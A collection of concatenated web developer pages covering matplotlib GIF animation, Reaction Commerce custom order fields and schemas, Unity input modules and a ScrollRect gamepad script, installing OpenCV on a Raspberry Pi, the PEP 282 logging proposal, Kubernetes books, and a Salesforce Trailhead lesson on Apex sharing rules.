import sys import numpy as np import matplotlib.pyplot as plt from matplotlib.animation import FuncAnimation fig, ax = plt.subplots() fig.set_tight_layout(True) # Query the figure's on-screen size and DPI. Note that when saving the figure to # a file, we need to provide a DPI for that separately. print('fig size: {0} DPI, size in inches {1}'.format( fig.get_dpi(), fig.get_size_inches())) # Plot a scatter that persists (isn't redrawn) and the initial line. x = np.arange(0, 20, 0.1) ax.scatter(x, x + np.random.normal(0, 3.0, len(x))) line, = ax.plot(x, x - 5, 'r-', linewidth=2) def update(i): label = 'timestep {0}'.format(i) print(label) # Update the line and the axes (with a new xlabel). Return a tuple of # "artists" that have to be redrawn for this frame. line.set_ydata(x - 5 + i) ax.set_xlabel(label) return line, ax if __name__ == '__main__': # FuncAnimation will call the 'update' function for each frame; here # animating over 10 frames, with an interval of 200ms between frames. anim = FuncAnimation(fig, update, frames=np.arange(0, 10), interval=200) if len(sys.argv) > 1 and sys.argv[1] == 'save': anim.save('line.gif', dpi=80, writer='imagemagick') else: # plt.show() will just loop the animation forever. plt.show()
If you want a fancier theme, install the seaborn library and just add:
import seaborn
Then you'll get this image:
A word of warning on size: even though the GIFs I show here only have 10 frames and the graphics is very bare-bones, they weigh in at around 160K each. AFAIU, animated GIFs don't use cross-frame compression, which makes them very byte-hungry for longer frame sequences. Reducing the number of frames to the bare minimum and making the images smaller (by playing with the figure size and/or DPI in matplotlib) can help alleviate the problem somewhat. | https://eli.thegreenplace.net/2016/drawing-animated-gifs-with-matplotlib/ | CC-MAIN-2019-22 | en | refinedweb |
How To: Store Custom Order Fields
Prerequisite ReadingPrerequisite Reading
OverviewOverview
For reporting, integrations, or other reasons, you may want to store additional fields when placing an order. This might be data from the client placing the order, data you can or must generate on the server, or some combination of the two.
The core orders plugin supports attaching additional arbitrary fields to orders, but you must do a bit of work to enable it. The first step is to decide whether the data you need can safely come from clients or if it must be built on the server. An in-between approach is to send data from the client but validate and extend it on the server.
Big picture, here's what you'll do:
- Implement one or both of the following:
- Enable and configure clients to send custom order fields
- Generate or transform custom order fields on the server
- Extend the SimpleSchema for
Orderso that your custom fields will pass validation and be saved.
- Optionally expose some of your custom fields through GraphQL.
Enabling Clients to Send Additional Order DataEnabling Clients to Send Additional Order Data
The only step necessary to allow clients to send additional order fields is to define the expected schema for it in GraphQL, which you do by extending the
OrderInput GraphQL input type in a custom plugin to add a
customFields field:
"Additional order fields" input CustomOrderFieldsInput { "The user agent string for the browser from which this order was placed" browserUserAgent: String! } extend input OrderInput { "Additional order fields" customFields: CustomOrderFieldsInput! }
Now in your storefront code, you can add the now-required extra fields:
// `order` input object for `placeOrder` GraphQL mutation const order = { customFields: { browserUserAgent: window.navigator.userAgent }, // all other required OrderInput props };
Transforming or Adding Custom Order Fields on the ServerTransforming or Adding Custom Order Fields on the Server
Whether or not you've allowed clients to send additional order data, you can also provide a function that returns custom order fields on the server. Do this using the
functionsByType option in
registerPackage:
functionsByType: { transformCustomOrderFields: [({ context, customFields, order }) => ({ ...customFields, // This is a simple example. IRL you should pick only headers you need. headers: context.requestHeaders })] },
As you can see in the example, the function receives an object argument with
context,
customFields, and
order properties.
order is the full order that is about to be created.
customFields is the current custom fields object that would be saved as
order.customFields. This may be from the client placing the order, if you've allowed clients to send it, or it may be from
transformCustomOrderFields functions registered by other plugins. It will be an empty object if no other
transformCustomOrderFields functions have run and the client did not pass any custom fields.
The object you return will replace
order.customFields, so if you want to keep the properties already in
customFields, be sure to add them to the object you return, or simply
return customFields if you have no changes to make. You may also further validate the object and either remove properties from it or throw an error.
transformCustomOrderFields functions may be
async if necessary.
Extending the Order SchemaExtending the Order Schema
If you are adding custom fields either from clients or from server functions, you must also extend the SimpleSchema for
Order so that it validates for storage. This is similar to the "Enabling Clients to Send Additional Order Data" task, but you must extend the SimpleSchema rather than the GraphQL schema, and it's required even if all data is being generated on the server. In your custom plugin:
import { Order } from "/imports/collections/schemas"; const customFieldsSchema = new SimpleSchema({ browserUserAgent: String }); Order.extend({ customFields: customFieldsSchema });
Exposing Custom Fields Through GraphQLExposing Custom Fields Through GraphQL
If you are collecting extra order fields only for reporting or integration purposes, it may not be necessary to have them available through GraphQL queries. But if you do need some fields added to orders retrieved by GraphQL, it is easy to do this by extending the schema and adding resolvers in your custom plugin:
extend type Order { "The user agent string for the browser from which this order was placed" browserUserAgent: String! }
const resolvers = { Order: { browserUserAgent: (node) => node.customFields.browserUserAgent } };
And then query for it:
{ orderById(id: "123", shopId: "456", token: "abc") { browserUserAgent } } | https://docs.reactioncommerce.com/docs/next/how-to-store-custom-order-fields | CC-MAIN-2019-22 | en | refinedweb |
base module that raises events and sends them to GameObjects.
An Input Module is a component of the EventSystem that is responsible for raising events and sending them to GameObjects for handling. The BaseInputModule is a class that all Input Modules in the EventSystem inherit from. Examples of provided modules are TouchInputModule and StandaloneInputModule, if these are inadequate for your project you can create your own by extending from the BaseInputModule.
using UnityEngine; using UnityEngine.EventSystems;
// Create a module that every tick sends a 'Move' event to // the target object
public class MyInputModule : BaseInputModule { public GameObject m_TargetObject;
public override void Process() { if (m_TargetObject == null) return; ExecuteEvents.Execute(m_TargetObject, new BaseEventData(eventSystem), ExecuteEvents.moveHandler); } }
Did you find this page useful? Please give it a rating: | https://docs.unity3d.com/ScriptReference/EventSystems.BaseInputModule.html | CC-MAIN-2019-22 | en | refinedweb |
Schemas
If will be easier to understand this section of the tutorial if you have read and understood the Schemas section of the Meteor Guide
While Mongo is a "schemaless" database that does not mean schemas are a bad idea. In fact they are a great idea and so Reaction Commerce uses a package called Simple Schema to build and enforce schemas. This package is recommended in the Meteor Guide and we recommend it's use as well.
In addition to Simple Schema we use a package called Autoform which allows
you to define a form as derived from a particular schema, saving a lot of time and repetitive code. One of the most
obvious uses is in the cart where the various forms for things like Address are derived from their corresponding Schema.
You can import Schemas from
/lib/collections/schemas on both client and server.
Adding Fields to a SchemaAdding Fields to a Schema
Adding fields to an existing schema is very simple. Simply declare a new instance of your schema with the additional fields defined and attach it to your collection. Schemas are additive by default.
So this would look something like
import { Accounts } from "/lib/collections"; export const myAccountSchema = new SimpleSchema({ height: { type: String, optional: true } }); Accounts.attachSchema(myAccountSchema);
Removing Fields from a SchemaRemoving Fields from a Schema
In ecommerce it's very important to ensure that your checkout flow is as simple as possible (but no simpler) so that customers experience is as easy as possible. And different types of stores may have different types of data that they collect and store. For example, a store that sells downloads has no need to collect a shipping address.
Removing fields from a Schema is relatively straight-ahead in that we just need to replace an entire Schema with a copy of that schema with the unnecessary fields removed and specifying a replace parameter.
For example if you wanted to remove the
note field from the
Account schema you would create a
lib directory (because
schemas are used on both client and serve) in the beesknees package and create a file called
schemas.js. In that you would
make a copy of the Account schema, remove the
note field and then add this line
import { Accounts } from "/lib/collections"; import { Accounts as AccountsSchema } from "/lib/collections/schemas"; Accounts.attachSchema(AccountsSchema, {replace: true});
Because our package is loaded last (because we imported it last), even though there is already an Accounts schema, our
definition will override the built-in one and both forms and database inserts will use our custom one.
In order for this schema to be loaded however, you will need to add imports in the
index.js files for both your
plugin's
client and
server.
Next: Adding i18n | https://docs.reactioncommerce.com/docs/1.14.0/plugin-schemas-8 | CC-MAIN-2019-22 | en | refinedweb |
How to Deploy OpenCV on Raspberry Pi and Enable Machine Vision
How to Deploy OpenCV on Raspberry Pi and Enable Machine Vision
Want to learn how to enable machine vision on your Raspberry Pi? Check out this tutorial on how to deploy the OpenCV on your Raspberry Pi.
Join the DZone community and get the full member experience.Join For Free
OpenCV is an integral part of machine vision. In this tutorial, you will learn to deploy the OpenCV library on a Raspberry Pi, using Raspbian Jessie for testing. You’ll install OpenCV from source code in the Raspberry Pi board.
How to Build OpenCV From the Source on a Raspberry Pi
To start building the OpenCV library from source code on Raspberry Pi, you’ll first need to install development libraries.
How to Install Development Libraries
Type these commands on the Raspberry Pi terminal:
$ sudo apt-get update $ sudo apt-get install build-essential git cmake pkg-config libgtk2.0-dev $ sudo apt-get install python2.7-dev python3-dev
You also need to install the required matrix, image, and video libraries:
$atlas-base-dev gfortran
The next step is to download the OpenCV source code via Git:
$ mkdir opencv $ cd opencv $ git clone $ git clone
Using a Python virtual environment, deploy the OpenCV on Raspberry Pi with virtualenv. The benefit of this approach is that it isolates the existing Python development environment.
How to build a home surveillance system using Raspberry Pi and camera
How to build an IoT system using Raspberry Pi
Install and Configure Virtualenv for OpenCV
If your Raspbian hasn’t installed it yet, you can install it using pip:
$ sudo pip install virtualenv virtualenvwrapper $ sudo rm -rf ~/.cache/pip
Then, you can configure a virtualenv in your bash profile:
$ nano ~/.profile
Now, add the following scripts:
export WORKON_HOME=$HOME/.virtualenvs source /usr/local/bin/virtualenvwrapper.sh
Next, save your bash profile file when finished. To create a Python virtual environment, type this command:
$ mkvirtualenv cv
This command will create a Python virtual environment called cv. If you’re using Python 3, you can create the virtual environment with the following command:
$ mkvirtualenv cv -p python3
You should see (cv) on your terminal. If you close the terminal or call a new terminal, you’d have to activate your Python virtual environment again:
$ source ~/.profile</strong> $ workon cv
The following screenshot shows a sample Python virtual environment form called cv:
Inside the Python virtual terminal, continue installing NumPy as the required library for OpenCV Python. You can install the library using pip:
$ pip install numpy
Now, you’re ready to build and install OpenCV from the source. After cloning the OpenCV library, you can build it by typing the following commands:
$ cd ~/opencv/ $ mkdir build $ cd build $ cmake -D CMAKE_BUILD_TYPE=RELEASE \ -D CMAKE_INSTALL_PREFIX=/usr/local \ -D INSTALL_C_EXAMPLES=ON \ -D INSTALL_PYTHON_EXAMPLES=ON \ -D OPENCV_EXTRA_MODULES_PATH=~/opencv/opencv_contrib/modules \ -D BUILD_EXAMPLES=ON ..
Next, install the OpenCV library on your internal system from Raspbian OS:
$ make -j4 $ sudo make install $ sudo ldconfig
When you are done, you will have to configure the library so that Python can access it through Python binding. The following is a list of command steps for configuring with Python 2.7:
$ ls -l /usr/local/lib/python2.7/site-packages/ $ cd ~/.virtualenvs/cv/lib/python2.7/site-packages/ $ ln -s /usr/local/lib/python2.7/site-packages/cv2.so cv2.so
If you’re using Python 3.x (say, Python 3.4), perform the following steps on the terminal:
$ ls /usr/local/lib/python3.4/site-packages/ $
The installation process is over.
Verifying the OpenCV Installation on Raspberry Pi
Now, you need to verify whether OpenCV has been installed correctly by checking the OpenCV version:
$ workon cv $ python >>> import cv2 >>> cv2.__version__
You should see the OpenCV version on the terminal. A sample program output is shown in the following screenshot:
How to use OpenCV to Enable Computer Vision
The next demo displays an image file using OpenCV. For this scenario, you can use the
cv2.imshow() function to display a picture file. For testing, log into the Raspberry Pi desktop to execute the program. Type the following script on a text editor:
import numpy as np import cv2 img = cv2.imread('circle.png') cv2.imshow('My photo', img) cv2.waitKey(0) cv2.destroyAllWindows()
Here, circle.png has been used as a picture source; you can use whichever file you want. Save the script into a file called
ch03_hello_opencv.py; now, open the terminal inside your Raspberry Pi desktop and type this command:
$ python ch03_hello_opencv.py
If successful, you should see a dialog that displays a picture:
The picture dialog shows up because you called
cv2.waitKey(0) in the code. Press any key to close the dialog.
Lastly, close the dialog by calling the
cv2.destroyAllWindows() function after receiving a click event. And, there you have }} | https://dzone.com/articles/how-to-deploy-opencv-on-raspberry-pi-enabling-mach?fromrel=true | CC-MAIN-2019-22 | en | refinedweb |
Abstract
This PEP describes a proposed logging package for Python's standard library. Basically the system involves the user creating one or more logger objects on which methods are called to log debugging notes, general information, warnings, errors etc. Different logging 'levels' can be used to distinguish important messages from less important.
Influences
This proposal was put together after having studied the following logging packages: o java.util.logging in JDK 1.4 (a.k.a. JSR047) [1] o log4j [2] o the Syslog package from the Protomatter project [3] o MAL's mx.Log package [4]
Simple Example
This shows a very simple example of how the logging package can be used to generate simple logging output on stderr. --------- mymodule.py ------------------------------- import logging log = logging.getLogger("MyModule") def doIt(): log.debug("Doin' stuff...") #do stuff... raise TypeError, "Bogus type error for testing" ----------------------------------------------------- --------- myapp.py ---------------------------------- import mymodule, logging logging.basicConfig() log = logging.getLogger("MyApp") log.info("Starting my app") try: mymodule.doIt() except Exception, e: log.exception("There was a problem.") log.info("Ending my app") ----------------------------------------------------- % python myapp.py INFO:MyApp: Starting my app DEBUG:MyModule: Doin' stuff... ERROR:MyApp: There was a problem. Traceback (most recent call last): File "myapp.py", line 9, in ? mymodule.doIt() File "mymodule.py", line 7, in doIt raise TypeError, "Bogus type error for testing" TypeError: Bogus type error for testing INFO:MyApp: Ending my app The above example shows the default output format. All aspects of the output format should be configurable, so that you could have output formatted like this: 2002-04-19 07:56:58,174 MyModule DEBUG - Doin' stuff... or just Doin' stuff...
Control Flow
Applications make logging calls on *Logger* objects. Loggers are organized in a hierarchical namespace and child Loggers inherit some logging properties from their parents in" These Logger objects create *LogRecord* objects which are passed to *Handler* objects for output. Both Loggers and Handlers may use logging *levels* and (optionally) *Filters* to decide if they are interested in a particular LogRecord. When it is necessary to output a LogRecord externally, a Handler can (optionally) use a *Formatter* to localize and format the message before sending it to an I/O stream. Each Logger keeps track of a set of output Handlers. By default all Loggers also send their output to all Handlers of their ancestor Loggers. Loggers may, however, also be configured to ignore Handlers higher up the tree.. The overall Logger hierarchy can also have a level associated with it, which takes precedence over the levels of individual Loggers. This is done through a module-level function: def disable(lvl): """ Do not generate any LogRecords for requests with a severity less than 'lvl'. """ ...
Levels
The logging levels, in increasing order of importance, are: DEBUG INFO WARN ERROR CRITICAL The term CRITICAL is used in preference to FATAL, which is used by log4j. The levels are conceptually the same - that of a serious, or very serious, error. However, FATAL implies death, which in Python implies a raised and uncaught exception, traceback, and exit. Since the logging module does not enforce such an outcome from a FATAL-level log entry, it makes sense to use CRITICAL in preference to FATAL. These are just integer constants, to allow simple comparison of importance. Experience has shown that too many levels can be confusing, as they lead to subjective interpretation of which level should be applied to any particular log request. Although the above levels are strongly recommended, the logging system should not be prescriptive. Users may define their own levels, as well as the textual representation of any levels. User defined levels must, however, obey the constraints that they are all positive integers and that they increase in order of increasing severity. User-defined logging levels are supported through two module-level functions: def getLevelName(lvl): """Return the text for level 'lvl'.""" ... def addLevelName(lvl, lvlName): """ Add the level 'lvl' with associated text 'levelName', or set the textual representation of existing level 'lvl' to be 'lvlName'.""" ...
Loggers
Each Logger object keeps track of a log level (or threshold) that it is interested in, and discards log requests below that level. A *Manager* class instance maintains the hierarchical namespace of named Logger objects. Generations are denoted with dot-separated names: Logger "foo" is the parent of Loggers "foo.bar" and "foo.baz". The Manager class instance is a singleton and is not directly exposed to users, who interact with it using various module-level functions. The general logging method is: class Logger: def log(self, lvl, msg, *args, **kwargs): """Log 'str(msg) % args' at logging level 'lvl'.""" ... However, convenience functions are defined for each logging level: class Logger: def debug(self, msg, *args, **kwargs): ... def info(self, msg, *args, **kwargs): ... def warn(self, msg, *args, **kwargs): ... def error(self, msg, *args, **kwargs): ... def critical(self, msg, *args, **kwargs): ... Only one keyword argument is recognized at present - "exc_info". If true, the caller wants exception information to be provided in the logging output. This mechanism is only needed if exception information needs to be provided at *any* logging level. In the more common case, where exception information needs to be added to the log only when errors occur, i.e. at the ERROR level, then another convenience method is provided: class Logger: def exception(self, msg, *args): ... This should only be called in the context of an exception handler, and is the preferred way of indicating a desire for exception information in the log. The other convenience methods are intended to be called with exc_info only in the unusual situation where you might want to provide exception information in the context of an INFO message, for example. The "msg" argument shown above will normally be a format string; however, it can be any object x for which str(x) returns the format string. This facilitates, for example, the use of an object which fetches a locale- specific message for an internationalized/localized application, perhaps using the standard gettext module. An outline example: class Message: """Represents a message""" def __init__(self, id): """Initialize with the message ID""" def __str__(self): """Return an appropriate localized message text""" ... logger.info(Message("abc"), ...) Gathering and formatting data for a log message may be expensive, and a waste if the logger was going to discard the message anyway. To see if a request will be honoured by the logger, the isEnabledFor() method can be used: class Logger: def isEnabledFor(self, lvl): """ Return true if requests at level 'lvl' will NOT be discarded. """ ... so instead of this expensive and possibly wasteful DOM to XML conversion: ... hamletStr = hamletDom.toxml() log.info(hamletStr) ... one can do this: if log.isEnabledFor(logging.INFO): hamletStr = hamletDom.toxml() log.info(hamletStr) When new loggers are created, they are initialized with a level which signifies "no level". A level can be set explicitly using the setLevel() method: class Logger: def setLevel(self, lvl): ... If a logger's level is not set, the system consults all its ancestors, walking up the hierarchy until an explicitly set level is found. That is regarded as the "effective level" of the logger, and can be queried via the getEffectiveLevel() method: def getEffectiveLevel(self): ... Loggers are never instantiated directly. Instead, a module-level function is used: def getLogger(name=None): ... If no name is specified, the root logger is returned. Otherwise, if a logger with that name exists, it is returned. If not, a new logger is initialized and returned. Here, "name" is synonymous with "channel name". Users can specify a custom subclass of Logger to be used by the system when instantiating new loggers: def setLoggerClass(klass): ... The passed class should be a subclass of Logger, and its __init__ method should call Logger.__init__.
Handlers
Handlers are responsible for doing something useful with a given LogRecord. The following core Handlers will be implemented: - StreamHandler: A handler for writing to a file-like object. - FileHandler: A handler for writing to a single file or set of rotating files. - SocketHandler: A handler for writing to remote TCP ports. - DatagramHandler: A handler for writing to UDP sockets, for low-cost logging. Jeff Bauer already had such a system [5]. - MemoryHandler: A handler that buffers log records in memory until the buffer is full or a particular condition occurs [1]. - SMTPHandler: A handler for sending to email addresses via SMTP. - SysLogHandler: A handler for writing to Unix syslog via UDP. - NTEventLogHandler: A handler for writing to event logs on Windows NT, 2000 and XP. - HTTPHandler: A handler for writing to a Web server with either GET or POST semantics. Handlers can also have levels set for them using the setLevel() method: def setLevel(self, lvl): ... The FileHandler can be set up to create a rotating set of log files. In this case, the file name passed to the constructor is taken as a "base" file name. Additional file names for the rotation are created by appending .1, .2, etc. to the base file name, up to a maximum as specified when rollover is requested. The setRollover method is used to specify a maximum size for a log file and a maximum number of backup files in the rotation. def setRollover(maxBytes, backupCount): ... If maxBytes is specified as zero, no rollover ever occurs and the log file grows indefinitely. If a non-zero size is specified, when that size is about to be exceeded, rollover occurs. The rollover method ensures that the base file name is always the most recent, .1 is the next most recent, .2 the next most recent after that, and so on. There are many additional handlers implemented in the test/example scripts provided with [6] - for example, XMLHandler and SOAPHandler.
LogRecords
A LogRecord acts as a receptacle for information about a logging event. It is little more than a dictionary, though it does define a getMessage method which merges a message with optional runarguments.
Formatters
A Formatter is responsible for converting a LogRecord to a string representation. A Handler may call its Formatter before writing a record. The following core Formatters will be implemented: - Formatter: Provide printf-like formatting, using the % operator. - BufferingFormatter: Provide formatting for multiple messages, with header and trailer formatting support. Formatters are associated with Handlers by calling setFormatter() on a handler: def setFormatter(self, form): ... Formatters use the % operator to format the logging message. The format string should contain %(name)x and the attribute dictionary of the LogRecord is used to obtain message-specific data. The following attributes are provided: %(name)s Name of the logger (logging channel) %(levelno)s Numeric logging level for the message (DEBUG, INFO, WARN, ERROR, CRITICAL) %(levelname)s Text logging level for the message ("DEBUG", "INFO", "WARN", "ERROR", "CRITICAL") %(pathname)s Full pathname of the source file where the logging call was issued (if available) %(filename)s Filename portion of pathname %(module)s Module from which logging call was made %) %(message)s The result of record.getMessage(), computed just as the record is emitted If a formatter sees that the format string includes "(asctime)s", the creation time is formatted into the LogRecord's asctime attribute. To allow flexibility in formatting dates, Formatters are initialized with a format string for the message as a whole, and a separate format string for date/time. The date/time format string should be in time.strftime format. The default value for the message format is "%(message)s". The default date/time format is ISO8601. The formatter uses a class attribute, "converter", to indicate how to convert a time from seconds to a tuple. By default, the value of "converter" is "time.localtime". If needed, a different converter (e.g. "time.gmtime") can be set on an individual formatter instance, or the class attribute changed to affect all formatter instances.
Filters
When level-based filtering is insufficient, a Filter can be called by a Logger or Handler to decide if a LogRecord should be output. Loggers and Handlers can have multiple filters installed, and any one of them can veto a LogRecord being output. class Filter: def filter(self, record): """ Return a value indicating true if the record is to be processed. Possibly modify the record, if deemed appropriate by the filter. """ The default behaviour allows a Filter to be initialized with a Logger name. This will only allow through events which are generated using the named logger or any of its children. For example, a filter initialized with "A.B" will allow events logged by loggers "A.B", "A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If initialized with the empty string, all events are passed by the Filter. This filter behaviour is useful when it is desired to focus attention on one particular area of an application; the focus can be changed simply by changing a filter attached to the root logger. There are many examples of Filters provided in [6].
Configuration
The main benefit of a logging system like this is that one can control how much and what logging output one gets from an application without changing that application's source code. Therefore, although configuration can be performed through the logging API, it must also be possible to change the logging configuration without changing an application at all. For long-running programs like Zope, it should be possible to change the logging configuration while the program is running. Configuration includes the following: - What logging level a logger or handler should be interested in. - What handlers should be attached to which loggers. - What filters should be attached to which handlers and loggers. - Specifying attributes specific to certain handlers and filters. In general each application will have its own requirements for how a user may configure logging output. However, each application will specify the required configuration to the logging system through a standard mechanism. The most simple configuration is that of a single handler, writing to stderr, attached to the root logger. This configuration is set up by calling the basicConfig() function once the logging module has been imported. def basicConfig(): ... For more sophisticated configurations, this PEP makes no specific proposals, for the following reasons: - A specific proposal may be seen as prescriptive. - Without the benefit of wide practical experience in the Python community, there is no way to know whether any given configuration approach is a good one. That practice can't really come until the logging module is used, and that means until *after* Python 2.3 has shipped. - There is a likelihood that different types of applications may require different configuration approaches, so that no "one size fits all". The reference implementation [6] has a working configuration file format, implemented for the purpose of proving the concept and suggesting one possible alternative. It may be that separate extension modules, not part of the core Python distribution, are created for logging configuration and log viewing, supplemental handlers and other features which are not of interest to the bulk of the community.
Thread Safety
The logging system should support thread-safe operation without any special action needing to be taken by its users.
Module-Level Functions
To support use of the logging mechanism in short scripts and small applications, module-level functions debug(), info(), warn(), error(), critical() and exception() are provided. These work in the same way as the correspondingly named methods of Logger - in fact they delegate to the corresponding methods on the root logger. A further convenience provided by these functions is that if no configuration has been done, basicConfig() is automatically called. At application exit, all handlers can be flushed by calling the function def shutdown(): ... This will flush and close all handlers.
Implementation
The reference implementation is Vinay Sajip's logging module [6].
Packaging
The reference implementation is implemented as a single module. This offers the simplest interface - all users have to do is "import logging" and they are in a position to use all the functionality available.
References
[1] java.util.logging [2] log4j: a Java logging package [3] Protomatter's Syslog [4] MAL mentions his mx.Log logging module: [5] Jeff Bauer's Mr. Creosote [6] Vinay Sajip's logging module.
This document has been placed in the public domain. | http://docs.activestate.com/activepython/2.7/peps/pep-0282.html | CC-MAIN-2019-22 | en | refinedweb |
When enterprise IT teams start out with Kubernetes, a lot can go wrong. In two Kubernetes books, the authors take an incremental approach to help readers absorb application deployment and architecture lessons that ease the transition to containers.
“The stuff that we build is really important, but it can be complicated at times,” said Brendan Burns, Microsoft distinguished engineer and co-author on both Kubernetes books. “People try to master the whole thing all at once,” he added, and the concepts can be opaque until you start to use the tool.
The abstraction that Kubernetes provides — decoupling the infrastructure from the application — enables a DevOps approach to code deployment, Burns said. New projects are easier to fit into the Docker containers and Kubernetes orchestration model, but repeatability, code review, immutability and standardized practices aren’t limited to greenfield apps. “Even for companies with a lot of code, efficiency is worth [transitioning to containers],” Burns said. “It’s 100% fine to run a fat, heavy container.” Organizations should host monoliths in containers orchestrated by Kubernetes and use this model to slowly slice that monolith apart with distributed services implemented with the original app.
While Kubernetes simplifies container provisioning and operation, users face manifold decisions around application efficiency and scalability.
While Kubernetes simplifies container provisioning and operation, users face manifold decisions around application efficiency and scalability. For example, Burns said, Kubernetes has specific objects for replication, stateful and other deployments; external or internal load balancer options; and debugging and inspection tools that provide multiple ways to troubleshoot incorrect operations.
Burns, Kelsey Hightower and Joe Beda wrote Kubernetes: Up and Running: Dive Into the Future of Infrastructure to help DevOps and other IT teams use Kubernetes and build apps on top of it; the book assumes a reliable Kubernetes deployment. Kubernetes: Up and Running is available from O’Reilly Media.
This book brings readers from their first container build and Kubernetes cluster through common kubectl commands and API objects and then the bulk of deployment considerations: pod operations, services and replicas, storage and more. The final chapter walks through three examples that run the gamut of real-world app deployments. “We didn’t want to write an app from scratch because it will be a little toy that is just for demo purposes,” Burns said. Instead, the examples are popular scenarios that readers can relate to their own jobs.
Users learn the power of Kubernetes once they get into objects, such as ReplicaSets. “Once you can run one pod well, you want to run multiple for resiliency or to scale out,” Burns said. ReplicaSets act like a cookie cutter, creating identical copies of a pod, as many as the user specifies. The next consideration is how to allocate and balance the load across these copies. Chapter 4, “Common kubectl Commands,” delves into API objects:
Everything contained in Kubernetes is represented by a RESTful resource. Throughout this book, we refer to these resources as Kubernetes objects. Each Kubernetes object exists at a unique HTTP path; for example, leads to the representation of a pod in the default namespace named my-pod. The kubectl command makes HTTP requests to these URLs to access the Kubernetes objects that reside at these paths.
Managing Kubernetes: Operating Kubernetes Clusters in the Real World, an upcoming Kubernetes book that Burns coauthored with Craig Tracey, will cover how to keep the tool working, its architecture, upgrade decisions, how to handle backup and disaster recovery, and other operational concerns around Kubernetes. Managing Kubernetes comes out in November 2018; O’Reilly Media publishes both Kubernetes books.
Source link | http://smartsoftware247.com/kubernetes-books-put-container-deployments-on-the-right-track/ | CC-MAIN-2019-22 | en | refinedweb |
>
So currently the scrollrect only works with mouse scrollwheel and mouse drag. Is there actually a way to get it working with gamepad? Eg right analog or something? Looked at documentation, didnt see anything really useful
Answer by SirKurt
·
Jan 15, 2015 at 03:59 PM
You can implement a new class from Scrollrect and IMoveHandler. Also IPinterClickHandler so you can select the object on pointer click.
Full code looks like this. You should attach this to your ui object which is going to be ScrollRect.
using UnityEngine;
using System.Collections;
using UnityEngine.UI;
using UnityEngine.EventSystems;
public class MoveScrollRect : ScrollRect, IMoveHandler, IPointerClickHandler {
private const float speedMultiplier = 0.1f;
public float xSpeed = 0;
public float ySpeed = 0;
private float hPos, vPos;
void IMoveHandler.OnMove(AxisEventData e) {
xSpeed += e.moveVector.x * (Mathf.Abs(xSpeed) + 0.1f);
ySpeed += e.moveVector.y * (Mathf.Abs(ySpeed) + 0.1f);
}
void Update() {
hPos = horizontalNormalizedPosition + xSpeed * speedMultiplier;
vPos = verticalNormalizedPosition + ySpeed * speedMultiplier;
xSpeed = Mathf.Lerp(xSpeed, 0, 0.1f);
ySpeed = Mathf.Lerp(ySpeed, 0, 0.1f);
if(movementType == MovementType.Clamped) {
hPos = Mathf.Clamp01(hPos);
vPos = Mathf.Clamp01(vPos);
}
normalizedPosition = new Vector2(hPos, vPos);
}
public void OnPointerClick(PointerEventData e) {
EventSystem.current.SetSelectedGameObject(gameObject);
}
public override void OnBeginDrag(PointerEventData eventData) {
EventSystem.current.SetSelectedGameObject(gameObject);
base.OnBeginDrag(eventData);
}
}
I couldn't find an elegant way to update ScrollRect position. Also as you see I calculate the scrolling speed myself. It can be tweaked to work better.
Anyways, if you improve the code, let me know.
alright, looking forward to the updated code :)
Updated the code. Check it out.
cool so I'm assuming this will work for gamepad too? Also, while we are on the subject, is it possible to make it so if gamepad is plugged in, it will scroll to a certain point?
I have tested. It works with gamepad.
You can set "normalizedPosition" field to scroll the ScrollRect. It should take a value between 0 and 1 if you want it to stay in frame.
Input class has methods that tells if a gamepad is connected or not. You can use that to set the position and also select the rectangle when a joystick is connected.
I have a problem. The scrolling works fantastically thank you very much now my problem is, if I want to select a button which is further down I cant do that because I scroll to it and then my gamepad actually doesnt want to select any.
Multiple Cars not working
1
Answer
Distribute terrain in zones
3
Answers
Are there any alternatives/fixes to/for ScrollRect?
0
Answers
How can I make my scroll list scroll 1 item per button click?
1
Answer
Drag on Scroll Rect Non Proportional
0
Answers | https://answers.unity.com/questions/874310/scrollrect-gamepad-support.html | CC-MAIN-2019-22 | en | refinedweb |
Identify and Prevent Sharing Violations
After completing this unit, you’ll be able to:
- Define sharing in Salesforce.
- Identify sharing violations in Apex classes.
- Enforce sharing rules securely in Apex classes.
As we learned in the first unit, Salesforce lets developers and admins control access to data at many different levels. Sharing is a specific setting that gives you record-level access control for all custom objects, and many standard objects. To learn more about different types of sharing, see Understanding Sharing in the Apex Developer Guide.
Back in the Kingdom Management developer org, our admin has configured sharing rules for some of the objects in the org. One of these is the Coin_ Purse__c object. The admin has configured this object to have private sharing.
By setting the organization-wide default sharing to “private,” our admin has restricted access to this object so users can see only their own records. This means that while Astha the Mighty can see that she has 400 pieces of gold and silver in her coin purse, she can’t see that the king currently has 50,000 pieces of gold.
Remember that Apex classes execute in system context, so by default Apex executes without enforcing sharing rules. This means that the sharing rules our admin configured are bypassed by default in custom apps. Let’s explore this.
- Log in to your Kingdom Management developer org.
- Select the CRUD/FLS & Sharing app in the top right.
- Click on the Sharing Demo tab.
In this app, users can view an inventory of the gold, silver, and copper coins that they have in their coin purses. As this data is potentially sensitive, we want to make sure that users can only see the contents of their own coin purses, and don’t have access to others.
Similar to the other apps we’ve looked at in this module, you can use the dropdown on the top left to simulate different users in the kingdom and verify that we’ve configured our access controls correctly.
- Using the dropdown, select the Farmer to simulate what this user sees in the UI.
- Click View Contents of Coin Purse.
Oh, no. As the Farmer, you’re able to see how much gold many other users in the system have, not just your own. This is a sharing violation. Remember, our admin set the Coin_Purse__c object sharing setting to private. Let’s see what’s happening.
- Click Return to User selection to return to the Admin user.
- Click the Apex Controller link to view the code.
The code is fairly straightforward.
public class Sharing_Demo { public List<Coin_Purse__c> whereclause_records {get; set;} public PageReference whereclause_search(){ if(Coin_Purse__c.sObjectType.getDescribe().isAccessible() && Schema.sObjectType.Coin_Purse__c.fields.Name.isAccessible() && Schema.sObjectType.Coin_Purse__c.fields.Gold_coins__c.isAccessible() && Schema.sObjectType.Coin_Purse__c.fields.Silver_Coins__c.isAccessible() && Schema.sObjectType.Coin_Purse__c.fields.Copper_Coins__c.isAccessible()) { String query = 'SELECT Name,Gold_coins__c,Silver_Coins__c, Copper_Coins__c FROM Coin_Purse__c'; whereclause_records = Database.query(query); return null; } else { return null; } } }
The app queries the database and returns objects back to Visualforce to be rendered. However as we learned Apex operates in system context, so this query doesn’t take sharing rules into account. This is why additional records are displayed in the app. How do we fix this?
Luckily the platform provides an apt keyword, “with sharing,” which you can add to your class definition to enforce sharing rules in Apex.
